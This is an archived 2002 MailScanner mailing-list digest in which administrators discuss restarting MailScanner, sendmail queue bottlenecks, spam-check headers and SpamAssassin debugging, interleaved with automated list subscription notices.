Linux issue or why does "mailscanner restart" not work? I always have to kill it to restart it. Matt You can check the status of mailscanner: /usr/local/MailScanner/bin/check_mailscanner To stop/start or restart mailscanner: /etc/rc.d/init.d/mailscanner stop /etc/rc.d/init.d/mailscanner start /etc/rc.d/init.d/mailscanner restart To kill mailscanner: kill -1 `cat /usr/local/MailScanner/var/virus.pid` From raymond at PROLOCATION.NET Thu Sep 26 00:25:24 2002 From: raymond at PROLOCATION.NET (Raymond Dijkxhoorn) Date: Thu Jan 12 21:15:46 2006 Subject: mailscanner restart In-Reply-To: <008501c264e7$73e67020$6701a8c0@matthew> Message-ID: Hi! > You can check the status of mailscanner: > > /usr/local/MailScanner/bin/check_mailscanner > > To stop/start or restart mailscanner: > > /etc/rc.d/init.d/mailscanner stop > /etc/rc.d/init.d/mailscanner start > /etc/rc.d/init.d/mailscanner restart Works just fine here, with RedHat 7.2 and 7.3 ... Bye, Raymond. From mailscanner at ecs.soton.ac.uk Thu Sep 26 00:28:02 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:46 2006 Subject: mailscanner restart In-Reply-To: <008501c264e7$73e67020$6701a8c0@matthew> References: <008501c264e7$73e67020$6701a8c0@matthew> Message-ID: <1032996482.3d92468282a0a@secure.ecs.soton.ac.uk> Quoting Matt : > Just wandering, is this a Linux issue or why does "mailscanner restart" > not > work? I always have to kill it to restart it. Precisely how you need to kill it seems to vary between different flavours of Linux. I've never yet found a sure-fire way of doing it on all systems. And in V4 it's even harder as the child processes are all restarted independently. I think I've going to have to replace the "pid file" option with a "pid dir" one, and keep a list of all the current pids in that directory. Currently I use "killall /usr/bin/perl" which isn't exactly what you might want! :-) > > Matt > > > You can check the status of mailscanner: > > /usr/local/MailScanner/bin/check_mailscanner > > To stop/start or restart mailscanner: > > /etc/rc.d/init.d/mailscanner stop > /etc/rc.d/init.d/mailscanner start > /etc/rc.d/init.d/mailscanner restart > > To kill mailscanner: > > kill -1 `cat /usr/local/MailScanner/var/virus.pid` > -- Jules jkf@ecs.soton.ac.uk mailscanner@ecs.soton.ac.uk From chris at HARVESTROAD.COM Thu Sep 26 02:22:46 2002 From: chris at HARVESTROAD.COM (Chris Waltham) Date: Thu Jan 12 21:15:46 2006 Subject: Increasing MailScanner performance In-Reply-To: Message-ID: <5.1.0.14.2.20020926092213.037f0b50@mail.harvestroad.com> Hi Chris, >sendmail -oQ/var/spool/mqueue.in -q -v > >I have never done this in the mqueue.in dir tho, and I am not sure how well >it would work. I would obviously have mailscanner off when I did this. Thanks! That works pretty well. Not your fault, it only works as well as the machines it's trying to deliver mail to, can receive it. :D But yes, I've got MailScanner off right now.. Chris >Hope this helps? >..................................... >Christopher S. Campbell >UNIX Admin >First Albany Corp >chris.campbell@fac.com > > > > > > Chris Waltham > MAILSCANNER@JISCMAIL.AC.UK > .COM> cc: > Sent by: Subject: Increasing > MailScanner performance > MailScanner > mailing list > AIL.AC.UK> > > > 09/25/2002 01:52 > AM > Please respond to > MailScanner > mailing list > > > > > > >Hi guys, > >I've got a Linux box (kernel 2.2.19) with dual P3-700s and 512MB of RAM. >We're a small software company (with some web hosting & email stuff thrown >in), around 40 or 50 souls working here. I've noticed that messages sent >through MailScanner have started to take longer and longer to come through, >and some [l]users today have called up and whined to me about it. > >What can I do to improve my performance? If I go into /var/spool/mqueue.in >I get this: > >root@xxx:/var/spool/mqueue.in# ls | wc -l > 342 > >I'm running MailScanner 3.20-4 and SpamAssassin 2.20 (I think!), and if it >matters the POP3 daemon I'm using is cucipop. Loads on the machine are >generally pretty low, around 0.05-0.10, though it's been as high as 0.40 >today. We're scanning the emails with Sophos 3.57. Oh, I should say we're >using Sendmail too (8.11.2). > >Here are some lines from my MailScanner config, let me know if you want to >see more: > >Delivery Method = batch >Deliver In Background = yes > >Judging from this page >(http://www.sng.ecs.soton.ac.uk/mailscanner/faq.shtml) I should try setting >Delivery Method to "queue". Our DNS is fine, though. Any ideas? > >Here's how I'm starting my Sendmail: > > echo "Starting sendmail daemon (/usr/sbin/sendmail -bd >-ODeliveryMode=queueonly \ -OQueueDirectory=/var/spool/mqueue.in)..." > /usr/sbin/sendmail -bd -ODeliveryMode=queueonly >-OQueueDirectory=/var/spool/mqueue.in > echo "Starting sendmail daemon (/usr/sbin/sendmail -bd -q5m)..." > /usr/sbin/sendmail -q5m > >thanks guys, > > >Chris > >-- >Chris Waltham >Systems Administrator >HarvestRoad, Limited. >chris@harvestroad.com >phone: (08) 9338-3000 -- Chris Waltham Systems Administrator HarvestRoad, Limited. chris@harvestroad.com phone: (08) 9338-3000 From email at ace.net.au Thu Sep 26 02:26:30 2002 From: email at ace.net.au (Peter Nitschke) Date: Thu Jan 12 21:15:46 2006 Subject: bootscript In-Reply-To: <200209251833.g8PIXAr21522@ori.rl.ac.uk> References: <200209251833.g8PIXAr21522@ori.rl.ac.uk> Message-ID: <200209261056300873.08E472A2@smtp1.ace.net.au> Edit /etc/sysconfig/sendmail then restart sendmail. *********** REPLY SEPARATOR *********** On 25/09/2002 at 7:33 PM Rui Vitria wrote: >hi > >I changed my /var/run/sendmail.pid for "/usr/lib/sendmail -bd -q5m" and >restart the mailscanner, but nothing. > >what can i do for change this > >rgdrs From jim at ENTROPHY-FREE.NET Thu Sep 26 03:19:28 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:46 2006 Subject: bottlenecking? In-Reply-To: <1032994130.3d923d52c77b2@secure.ecs.soton.ac.uk> References: <5.1.1.6.0.20020925155955.02077ea8@beloit.edu> <1032994130.3d923d52c77b2@secure.ecs.soton.ac.uk> Message-ID: <1033006768.29746.125.camel@chaos.entrophy-free.net> On Wed, 2002-09-25 at 17:48, Julian Field wrote: > Quoting Tim Tyler : > > Mailscanner experts, > > We are currently running mailscanner 2.6 on AIX4.3.3 > > systems. Occassionally, we have noticed that mailscanner clogs up at > > peak > > periods and can't seem to process email for hours. This means that local > > or remote mail is stuck in /var/spool/mqueue.in for hours before > > eventually > > making it to the normal sendmail mqueue (if at all). If I kill the > > mailscanner process and restart it everything gets processed nearly > > immediately. > > > > Isn't mailscanner_check running in crontab supposed to make sure that > > the > > process is running ok? It would really be better if it simply killed the > > existing process every time and restarted it. I suggest this because if > > it > > thinks the process is running ok when it isn't, then its useless. > > Anyone's > > thoughts about killing and restarting the process every 20 minutes or so? > > > > Are there any other suggestions for configurations that can minimize > > bottlenecking? > > Not sure why you are hitting the problem. However, what you could do is set > the "Restart Every" interval much shorter. Then MailScanner will re-exec > itself more frequently, which will probably work around whatever the > underlying problem is. "Restart Every = 1200" would make it restart every 20 > minutes. > FWIW: I've seen this sort of problem to one degree or another with every V3 version of MailScanner that I've deployed. Its too soon to say if v4 will have the same sorts of problems. My solution is to use a smart Perl monitor, rather than a shell script, to manage the MailScanner processes. The perl code watches for excessive CPU consumption, excessive process size, or a MailScanner that's run longer than it should. If any of the boundary conditions are seen the offending process is killed and restarted. While I suppose a clever shell script could be written to do the same thing it was very easy to do with Perl and I took the path of least resistance. The V4 implementation brings new challenges. Not only do you have the mater process, but you also have a number of child processes to deal with. I'd like to see a pid file for each of the children, perhaps with a name of the form mailscanner1.pid, mailscanner2.pid, etc. And it would be awfully nice is killing the master process would cause it to reap its children. -- The instructions said to use Windows 98 or better, so I installed RedHat. From raymond at PROLOCATION.NET Thu Sep 26 08:12:46 2002 From: raymond at PROLOCATION.NET (Raymond Dijkxhoorn) Date: Thu Jan 12 21:15:46 2006 Subject: why mailscanner die? In-Reply-To: <200209260637.g8Q6bKL20996@dori.rl.ac.uk> Message-ID: Hi! > read-open eicar.doc: No such file or directory at > /usr/lib/perl5/site_perl/5.6.1/MIME/Body.pm line 417 > I think is no a huge problem if every minute you check is mailscanner > is up as I done. > I ask if is possible that only my installation has this odd behaviour? If you repost problems, also include the version number of MailScanner you are running... Bye, Raymond. From bovati at MONDADORI.COM Thu Sep 26 11:32:54 2002 From: bovati at MONDADORI.COM (Mirko Bovati) Date: Thu Jan 12 21:15:46 2006 Subject: why mailscanner die? In-Reply-To: References: Message-ID: <200209260932.54601.bovati@mondadori.com> On Thursday 26 September 2002 06:12 am, you wrote: > Hi! > > > read-open eicar.doc: No such file or directory at > > /usr/lib/perl5/site_perl/5.6.1/MIME/Body.pm line 417 > > I think is no a huge problem if every minute you check is mailscanner > > is up as I done. > > I ask if is possible that only my installation has this odd behaviour? > > If you repost problems, also include the version number of MailScanner you > are running... Sorry, The version is 3.22-14. bye Mirko Bovati From LISTSERV at JISCMAIL.AC.UK Thu Sep 26 06:23:22 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:46 2006 Subject: MAILSCANNER: barnaby_brown@PACIFIC.NET.AU requested to join Message-ID: <200209260523.GAA28048@magpie.ecs.soton.ac.uk> Thu, 26 Sep 2002 06:23:22 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Barnaby Brown . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER barnaby_brown@PACIFIC.NET.AU Barnaby Brown The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+barnaby_brown%40PACIFIC.NET.AU+Barnaby+Brown&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From mailscanner at ecs.soton.ac.uk Thu Sep 26 10:56:21 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:46 2006 Subject: bottlenecking? In-Reply-To: <1033006768.29746.125.camel@chaos.entrophy-free.net> References: <1032994130.3d923d52c77b2@secure.ecs.soton.ac.uk> <5.1.1.6.0.20020925155955.02077ea8@beloit.edu> <1032994130.3d923d52c77b2@secure.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020926105015.02443c18@imap.ecs.soton.ac.uk> At 03:19 26/09/2002, you wrote: >On Wed, 2002-09-25 at 17:48, Julian Field wrote: > > Quoting Tim Tyler : > > > Mailscanner experts, > > > We are currently running mailscanner 2.6 on AIX4.3.3 > > > systems. Occassionally, we have noticed that mailscanner clogs up at > > > peak > > > periods and can't seem to process email for hours. This means that local > > > or remote mail is stuck in /var/spool/mqueue.in for hours before > > > eventually > > > making it to the normal sendmail mqueue (if at all). If I kill the > > > mailscanner process and restart it everything gets processed nearly > > > immediately. > > > > > > Isn't mailscanner_check running in crontab supposed to make sure that > > > the > > > process is running ok? It would really be better if it simply killed the > > > existing process every time and restarted it. I suggest this because if > > > it > > > thinks the process is running ok when it isn't, then its useless. > > > Anyone's > > > thoughts about killing and restarting the process every 20 minutes or so? > > > > > > Are there any other suggestions for configurations that can minimize > > > bottlenecking? > > > > Not sure why you are hitting the problem. However, what you could do is set > > the "Restart Every" interval much shorter. Then MailScanner will re-exec > > itself more frequently, which will probably work around whatever the > > underlying problem is. "Restart Every = 1200" would make it restart > every 20 > > minutes. > > >FWIW: I've seen this sort of problem to one degree or another with every >V3 version of MailScanner that I've deployed. Its too soon to say if v4 >will have the same sorts of problems. My solution is to use a smart Perl >monitor, rather than a shell script, to manage the MailScanner >processes. The perl code watches for excessive CPU consumption, >excessive process size, or a MailScanner that's run longer than it >should. If any of the boundary conditions are seen the offending process >is killed and restarted. While I suppose a clever shell script could be >written to do the same thing it was very easy to do with Perl and I took >the path of least resistance. It would be interesting to discover what is actually causing the problem, as I've never seen it on our systems here at all. Have you checked everywhere under /var/spool/MailScanner for "core" files? These can take a very long time to scan, and should just be deleted most of the time. If many other people were seeing the same problem as you, I would have heard about it a lot. And I haven't, so I can only think this is a fairly unusual problem. >The V4 implementation brings new challenges. Not only do you have the >mater process, but you also have a number of child processes to deal >with. I'd like to see a pid file for each of the children, perhaps with >a name of the form mailscanner1.pid, mailscanner2.pid, etc. And it would >be awfully nice is killing the master process would cause it to reap its >children. I happened to write that for you last night. There are pid files for all of the children, and the master creates and destroys these as the children start and stop. I've written an init.d script for it (for RedHat) that has start, stop, restart, status and reload commands. It does the "reload" operation by doing a "kill -HUP" on all the MailScanner processes. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From glynn at MAKATI.TECHSQUARE.COM Thu Sep 26 10:50:24 2002 From: glynn at MAKATI.TECHSQUARE.COM (Glynn S. Condez) Date: Thu Jan 12 21:15:46 2006 Subject: why mailscanner die? References: <200209260932.54601.bovati@mondadori.com> Message-ID: <01ae01c26542$235f24c0$8201a8c0@proaccessph.com> Why dont you try to upgrade your mailscanner version to 3.23.3 :) --- Glynn --- ----- Original Message ----- From: "Mirko Bovati" To: Sent: Thursday, September 26, 2002 6:32 PM Subject: Re: why mailscanner die? > On Thursday 26 September 2002 06:12 am, you wrote: > > Hi! > > > > > read-open eicar.doc: No such file or directory at > > > /usr/lib/perl5/site_perl/5.6.1/MIME/Body.pm line 417 > > > I think is no a huge problem if every minute you check is mailscanner > > > is up as I done. > > > I ask if is possible that only my installation has this odd behaviour? > > > > If you repost problems, also include the version number of MailScanner you > > are running... > > Sorry, > The version is 3.22-14. > > > bye > Mirko Bovati > From djohnson at TELICA.COM Thu Sep 26 14:36:17 2002 From: djohnson at TELICA.COM (Donna J) Date: Thu Jan 12 21:15:46 2006 Subject: Spam Header not appearing; only " Message-ID: <200209261336.g8QDaHX17889@ori.rl.ac.uk> Hello MailScanner folks, We just installed Mailscanner on a test server and it does not appear to be doing any spam checks. We have not installed SpamAssasin. This line appears in the header of every incoming mail message: X-MailScanner: Found to be clean but this one does not: X-MailScanner-SpamCheck Here are some related settings from our mailscanner.conf file ................ Sign Unscanned Messages = yes Spam Checks = yes Spam Action = deliver Log Spam = no Use SpamAssassin = no Spam List = ORDB-RBL, relays.ordb.org. Spam List = spamcop.net, bl.spamcop.net. Spam List = Infinite-Monkeys, proxies.relays.monkeys.com. Spam List = osirusoft.com, relays.osirusoft.com. ..................... We must be doing something (probably obvious :) wrong. Your help appreciated. Also, we're using Innoculate (eTrust) as our virus protection software. Is anyone else using it. If so, what is the script we should be running in place of the Sophos wrapper/shell script when you use Sophos? Thank you, Donna J. From howard at harper-adams.ac.uk Thu Sep 26 14:45:59 2002 From: howard at harper-adams.ac.uk (Howard Robinson) Date: Thu Jan 12 21:15:46 2006 Subject: Sendmail question In-Reply-To: References: <200209241747.g8OHlUu03917@blackhole.harper-adams.ac.uk> Message-ID: <200209261339.g8QDdC408446@blackhole.harper-adams.ac.uk> Thanks to all in mailscannerland who replied to my question regarding multiple aliases files with sendmail. I was surprised how easy it was. After reading the replies the chapter in the O'Reilly Sendmail book made more sense to me. I have now got this one sorted. Again thanks Regards Howard Robinson (Senior Technical Development Officer) Harper Adams University College Edgmond Newport Shropshire TF10 8NB UK E-mail: hrobinson@harper-adams.ac.uk Tel. : +44(0)1952 820280 Via switchboard : +44(0)1952 815253 Direct line Fax. : +44(0)1952 814783 College Web site http://www.harper-adams.ac.uk From LISTSERV at JISCMAIL.AC.UK Thu Sep 26 15:04:35 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:46 2006 Subject: MAILSCANNER: list-a_jiscmail.mailscanner@CHIARK.GREENEND.ORG.UK requested to join Message-ID: <200209261404.PAA27984@magpie.ecs.soton.ac.uk> Thu, 26 Sep 2002 15:04:35 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Chiark Mail-To-News Gateway . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER list-a_jiscmail.mailscanner@CHIARK.GREENEND.ORG.UK Chiark Mail-To-News Gateway The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+list-a_jiscmail.mailscanner%40CHIARK.GREENEND.ORG.UK+Chiark+Mail-To-News+Gateway&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From jim at ENTROPHY-FREE.NET Thu Sep 26 15:24:47 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:46 2006 Subject: bottlenecking? In-Reply-To: <5.1.0.14.2.20020926105015.02443c18@imap.ecs.soton.ac.uk> References: <1032994130.3d923d52c77b2@secure.ecs.soton.ac.uk> <5.1.1.6.0.20020925155955.02077ea8@beloit.edu> <1032994130.3d923d52c77b2@secure.ecs.soton.ac.uk> <5.1.0.14.2.20020926105015.02443c18@imap.ecs.soton.ac.uk> Message-ID: <1033050288.29744.176.camel@chaos.entrophy-free.net> On Thu, 2002-09-26 at 04:56, Julian Field wrote: > At 03:19 26/09/2002, you wrote: > > > > >FWIW: I've seen this sort of problem to one degree or another with every > >V3 version of MailScanner that I've deployed. Its too soon to say if v4 > >will have the same sorts of problems. My solution is to use a smart Perl > >monitor, rather than a shell script, to manage the MailScanner > >processes. The perl code watches for excessive CPU consumption, > >excessive process size, or a MailScanner that's run longer than it > >should. If any of the boundary conditions are seen the offending process > >is killed and restarted. While I suppose a clever shell script could be > >written to do the same thing it was very easy to do with Perl and I took > >the path of least resistance. > > It would be interesting to discover what is actually causing the problem, > as I've never seen it on our systems here at all. Have you checked > everywhere under /var/spool/MailScanner for "core" files? These can take a > very long time to scan, and should just be deleted most of the time. If > many other people were seeing the same problem as you, I would have heard > about it a lot. And I haven't, so I can only think this is a fairly unusual > problem. > I certainly wouldn't say that it is a common problem or that it happens at all frequently. I only see it happen at infrequent intervals. I don't know if the problem is load related or message related, but when it happens all processing of messages from mqueue.in stops and mail starts backing up. By the time I'd notice the problem (usually 15 minutes to a hour later) I might have 10-15K messages in the input queue. At that point the name of the game is to get the queue cleared and make the phone stop ringing, so investigative work mostly has to be done in retro spec. I have looked for core files and not found any. So far, simply killing the MS process and restarting it causes message processing to resume. For a while I thought that the problem only occurred on my large volume servers and was leaning towards a load related cause. But I have observed it (even less frequently) on low volume servers (less that 15k messages/day). So far I haven't been able to duplicate that failure when I save off the contents of the mqueue.in dir and run that though my test jig. That might imply that there's some critical set of conditions that has to occur to cause MailScanner to go walk-about. One other thing that I've observed is that MailScanner always has a batch of messages in process at the time of the failure. The same message ID's exist both in the work directory and in the input queue. I guess I don't know exactly what MS was doing at the time it ran off into the weeds, only that it appeared to have been processing messages. > >The V4 implementation brings new challenges. Not only do you have the > >mater process, but you also have a number of child processes to deal > >with. I'd like to see a pid file for each of the children, perhaps with > >a name of the form mailscanner1.pid, mailscanner2.pid, etc. And it would > >be awfully nice is killing the master process would cause it to reap its > >children. > > I happened to write that for you last night. There are pid files for all of > the children, and the master creates and destroys these as the children > start and stop. I've written an init.d script for it (for RedHat) that has > start, stop, restart, status and reload commands. It does the "reload" > operation by doing a "kill -HUP" on all the MailScanner processes. > Very nice. -- The instructions said to use Windows 98 or better, so I installed RedHat. From info at pro-invest.ca Thu Sep 26 15:30:44 2002 From: info at pro-invest.ca (Mark Tavares) Date: Thu Jan 12 21:15:46 2006 Subject: Spamassasin not working?? Message-ID: I think my spamassasin/mailscanner combo has stopped working..I have restarted Mailscanner but to no avail. How can I be certain? Or what could I check next? Version 3.22-12 Thanks, Mark From LISTSERV at JISCMAIL.AC.UK Thu Sep 26 15:33:31 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:46 2006 Subject: MAILSCANNER: carles@DESCOM.ES requested to join Message-ID: <200209261433.PAA02037@magpie.ecs.soton.ac.uk> Thu, 26 Sep 2002 15:33:31 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Carles Munyoz . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER carles@DESCOM.ES Carles Munyoz The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+carles%40DESCOM.ES+Carles+Munyoz&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From LISTSERV at JISCMAIL.AC.UK Thu Sep 26 15:38:16 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:47 2006 Subject: MAILSCANNER: carles@DESCOM.ES requested to join Message-ID: <200209261438.PAA02652@magpie.ecs.soton.ac.uk> Thu, 26 Sep 2002 15:38:16 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Carles Munyoz . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER carles@DESCOM.ES Carles Munyoz The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+carles%40DESCOM.ES+Carles+Munyoz&L=MAILSCANNER ------------------------- Original mail header -------------------------- Return-Path: Received: from 130.246.192.52 by JISCMAIL.AC.UK (SMTPL release 1.0f) with TCP; Thu, 26 Sep 2002 15:38:15 +0100 Received: from hosting-smtp.descom.es (dns1.descom.es [195.235.166.35]) by ori.rl.ac.uk (8.11.1/8.11.1) with ESMTP id g8QEcEX05563 for ; Thu, 26 Sep 2002 15:38:14 +0100 Received: from localhost.localdomain ([192.168.23.111]) by hosting-smtp.descom.es (8.12.4/8.12.2) with ESMTP id g8QEbxr9031272 for ; Thu, 26 Sep 2002 16:38:00 +0200 From: Carles Xavier Munyoz =?iso-8859-1?q?Bald=F3?= Reply-To: carles@descom.es Organization: DESCOM To: "L-Soft list server at JISCMAIL (1.8e)" Subject: Re: Command confirmation request (7D542279) Date: Thu, 26 Sep 2002 16:37:59 +0200 User-Agent: KMail/1.4.1 References: <200209261432.g8QEWkax031027@hosting-mx1.descom.es> In-Reply-To: <200209261432.g8QEWkax031027@hosting-mx1.descom.es> MIME-Version: 1.0 Message-Id: <200209261637.59624.carles@descom.es> X-MailScanner: Found to be clean X-LSVline1: ok From tyler at beloit.edu Thu Sep 26 15:34:37 2002 From: tyler at beloit.edu (Tim Tyler) Date: Thu Jan 12 21:15:47 2006 Subject: bottlenecking? In-Reply-To: <1033050288.29744.176.camel@chaos.entrophy-free.net> from "Jim Levie" at Sep 26, 2002 09:24:47 AM Message-ID: <200209261434.g8QEYb825018@beloit.edu> Mailscanner, This has been my exact observation as well. I think I may play it safe and stop and start the process every 20 minutes because its killing the dependablility of quick and reliable email for my clients. mailscanner_check just doesn't handle it. Tim >> >I certainly wouldn't say that it is a common problem or that it happens >at all frequently. I only see it happen at infrequent intervals. I don't >know if the problem is load related or message related, but when it >happens all processing of messages from mqueue.in stops and mail starts >backing up. By the time I'd notice the problem (usually 15 minutes to a >hour later) I might have 10-15K messages in the input queue. At that >point the name of the game is to get the queue cleared and make the >phone stop ringing, so investigative work mostly has to be done in retro >spec. I have looked for core files and not found any. So far, simply >killing the MS process and restarting it causes message processing to >resume. > >For a while I thought that the problem only occurred on my large volume >servers and was leaning towards a load related cause. But I have >observed it (even less frequently) on low volume servers (less that 15k >messages/day). So far I haven't been able to duplicate that failure when >I save off the contents of the mqueue.in dir and run that though my test >jig. That might imply that there's some critical set of conditions that >has to occur to cause MailScanner to go walk-about. One other thing that >I've observed is that MailScanner always has a batch of messages in >process at the time of the failure. The same message ID's exist both in >the work directory and in the input queue. I guess I don't know exactly >what MS was doing at the time it ran off into the weeds, only that it >appeared to have been processing messages. > >> >The V4 implementation brings new challenges. Not only do you have the >> >mater process, but you also have a number of child processes to deal >> >with. I'd like to see a pid file for each of the children, perhaps with >> >a name of the form mailscanner1.pid, mailscanner2.pid, etc. And it would >> >be awfully nice is killing the master process would cause it to reap its >> >children. >> >> I happened to write that for you last night. There are pid files for all of >> the children, and the master creates and destroys these as the children >> start and stop. I've written an init.d script for it (for RedHat) that has >> start, stop, restart, status and reload commands. It does the "reload" >> operation by doing a "kill -HUP" on all the MailScanner processes. >> >Very nice. >-- >The instructions said to use Windows 98 or better, so I installed >RedHat. > -- Tim Tyler Network Manager - Beloit College tyler@beloit.edu From brose at MED.WAYNE.EDU Thu Sep 26 15:47:53 2002 From: brose at MED.WAYNE.EDU (Rose, Bobby) Date: Thu Jan 12 21:15:47 2006 Subject: Spamassasin not working?? Message-ID: Do this (only for debugging).. In the sendmail.pl find the SA new object contruct "new Mail::SpamAssassin" and change it new Mail::SpamAssassin({'userprefs_filename' => $Config::SpamAssassinPrefsFile, 'dont_copy_prefs' => 0, 'debug' = > '1'}); The restart mailscanner and this will generate SA debug info on your console. I used this to track down the pyzor, dcc, razor problems that I reported earlier with MS 4.0 and SA 2.50 -----Original Message----- From: Mark Tavares [mailto:info@pro-invest.ca] Sent: Thursday, September 26, 2002 10:31 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Spamassasin not working?? I think my spamassasin/mailscanner combo has stopped working..I have restarted Mailscanner but to no avail. How can I be certain? Or what could I check next? Version 3.22-12 Thanks, Mark From info at pro-invest.ca Thu Sep 26 16:26:04 2002 From: info at pro-invest.ca (Mark Tavares) Date: Thu Jan 12 21:15:47 2006 Subject: Spamassasin not working?? In-Reply-To: Message-ID: Not sure if I did that right...this is what I get.. MailScanner: syntax error at /usr/local/MailScanner/bin/sendmail.pl line 66, near "= >" syntax error at /usr/local/MailScanner/bin/sendmail.pl line 89, near "}" Compilation failed in require at /usr/local/MailScanner/bin/mailscanner line 96. Any help? Thanks, -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Rose, Bobby Sent: Thursday, September 26, 2002 10:48 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Spamassasin not working?? Do this (only for debugging).. In the sendmail.pl find the SA new object contruct "new Mail::SpamAssassin" and change it new Mail::SpamAssassin({'userprefs_filename' => $Config::SpamAssassinPrefsFile, 'dont_copy_prefs' => 0, 'debug' = > '1'}); The restart mailscanner and this will generate SA debug info on your console. I used this to track down the pyzor, dcc, razor problems that I reported earlier with MS 4.0 and SA 2.50 -----Original Message----- From: Mark Tavares [mailto:info@pro-invest.ca] Sent: Thursday, September 26, 2002 10:31 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Spamassasin not working?? I think my spamassasin/mailscanner combo has stopped working..I have restarted Mailscanner but to no avail. How can I be certain? Or what could I check next? Version 3.22-12 Thanks, Mark From info at pro-invest.ca Thu Sep 26 16:30:02 2002 From: info at pro-invest.ca (Mark Tavares) Date: Thu Jan 12 21:15:47 2006 Subject: Spamassasin not working?? In-Reply-To: Message-ID: Actually got it now...took the space out...duh!! -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Rose, Bobby Sent: Thursday, September 26, 2002 10:48 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Spamassasin not working?? Do this (only for debugging).. In the sendmail.pl find the SA new object contruct "new Mail::SpamAssassin" and change it new Mail::SpamAssassin({'userprefs_filename' => $Config::SpamAssassinPrefsFile, 'dont_copy_prefs' => 0, 'debug' = > '1'}); The restart mailscanner and this will generate SA debug info on your console. I used this to track down the pyzor, dcc, razor problems that I reported earlier with MS 4.0 and SA 2.50 -----Original Message----- From: Mark Tavares [mailto:info@pro-invest.ca] Sent: Thursday, September 26, 2002 10:31 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Spamassasin not working?? I think my spamassasin/mailscanner combo has stopped working..I have restarted Mailscanner but to no avail. How can I be certain? Or what could I check next? Version 3.22-12 Thanks, Mark From info at pro-invest.ca Thu Sep 26 16:56:32 2002 From: info at pro-invest.ca (Mark Tavares) Date: Thu Jan 12 21:15:47 2006 Subject: Spamassasin not working?? In-Reply-To: Message-ID: This is the only fail I see...do I go somewhere with this? debug: Failed to parse line in SpamAssassin configuration, skipping: auto_report_threshold 30 Thanks again.. Mark -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Rose, Bobby Sent: Thursday, September 26, 2002 10:48 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Spamassasin not working?? Do this (only for debugging).. In the sendmail.pl find the SA new object contruct "new Mail::SpamAssassin" and change it new Mail::SpamAssassin({'userprefs_filename' => $Config::SpamAssassinPrefsFile, 'dont_copy_prefs' => 0, 'debug' = > '1'}); The restart mailscanner and this will generate SA debug info on your console. I used this to track down the pyzor, dcc, razor problems that I reported earlier with MS 4.0 and SA 2.50 -----Original Message----- From: Mark Tavares [mailto:info@pro-invest.ca] Sent: Thursday, September 26, 2002 10:31 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Spamassasin not working?? I think my spamassasin/mailscanner combo has stopped working..I have restarted Mailscanner but to no avail. How can I be certain? Or what could I check next? Version 3.22-12 Thanks, Mark From mailscanner at ecs.soton.ac.uk Thu Sep 26 16:53:58 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:47 2006 Subject: Spam Header not appearing; only " In-Reply-To: <200209261336.g8QDaHX17889@ori.rl.ac.uk> Message-ID: <5.1.0.14.2.20020926165345.05514008@imap.ecs.soton.ac.uk> The SpamCheck header is only added if it thinks it is spam. At 14:36 26/09/2002, you wrote: >Hello MailScanner folks, > >We just installed Mailscanner on a test server and it does not appear to be >doing any spam checks. We have not installed SpamAssasin. > >This line appears in the header of every incoming mail message: > X-MailScanner: Found to be clean > >but this one does not: > X-MailScanner-SpamCheck > >Here are some related settings from our mailscanner.conf file >................ >Sign Unscanned Messages = yes >Spam Checks = yes >Spam Action = deliver >Log Spam = no >Use SpamAssassin = no >Spam List = ORDB-RBL, relays.ordb.org. 